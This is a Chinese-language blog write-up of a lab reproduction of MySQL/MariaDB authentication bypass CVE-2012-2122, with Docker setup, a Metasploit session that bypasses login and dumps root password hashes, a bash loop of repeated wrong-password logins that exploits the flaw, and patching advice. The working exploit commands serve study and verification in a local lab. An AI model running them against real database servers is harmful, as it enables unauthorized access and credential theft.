cat-nineteen
0%

MySQL身份认证漏洞(CVE-2012-2122)

发表于 更新于 分类于

漏洞描述

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

影响版本

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

FOFA语句

1

环境搭建

docker搭建;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
[root@localhost ~]# cd /opt/docker/vulhub/mysql/CVE-2012-2122/
[root@localhost CVE-2012-2122]# docker-compose up -d
Creating network "cve-2012-2122_default" with the default driver
Pulling mysql (vulhub/mysql:5.5.23)...
5.5.23: Pulling from vulhub/mysql
22dc81ace0ea: Pull complete
1a8b3c87dba3: Pull complete
91390a1c435a: Pull complete
07844b14977e: Pull complete
b78396653dae: Pull complete
fe8cde33ebc9: Pull complete
eb305569f43b: Pull complete
Digest: sha256:5bbb7570f16526da1de61e84487daade5614eb2a9bfd28a87bcf4d6795b94463
Status: Downloaded newer image for vulhub/mysql:5.5.23
Creating cve-2012-2122_mysql_1 ... done

[root@localhost CVE-2012-2122]# docker ps
CONTAINER ID   IMAGE                 COMMAND                  CREATED         STATUS         PORTS                                       NAMES
2365d270392c   vulhub/mysql:5.5.23   "/bin/bash -c mysqld…"   5 minutes ago   Up 5 minutes   0.0.0.0:3306->3306/tcp, :::3306->3306/tcp   cve-2012-2122_mysql_1

漏洞复现

漏洞分析

参考:https://blog.51cto.com/linuxgeek/998210

漏洞验证

利用metasploit工具进行验证;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@kali:~# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] 	/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v5.0.99-dev                          ]
+ -- --=[ 2045 exploits - 1106 auxiliary - 345 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

[*] Starting persistent handler(s)...
msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 192.168.220.132
rhosts => 192.168.220.132
msf5 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.220.132:3306  - 192.168.220.132:3306 The server allows logins, proceeding with bypass test
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 10% complete
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 20% complete
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 30% complete
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 40% complete
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 50% complete
[*] 192.168.220.132:3306  - 192.168.220.132:3306 Authentication bypass is 60% complete
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Successfully bypassed authentication after 612 attempts. URI: mysql://root:COXazJ@192.168.220.132:3306
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.220.132:3306  - 192.168.220.132:3306 Hash Table has been saved: /root/.msf4/loot/20211103060402_default_192.168.220.132_mysql.hashes_563578.txt
[*] 192.168.220.132:3306  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

image-20211103180612192

存在此漏洞!

漏洞利用

linux中执行:

1
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.220.132  ; done

image-20211103180812294

漏洞加固

  1. 升级官方补丁;
  2. 更新MySQL。

欢迎关注我的其它发布渠道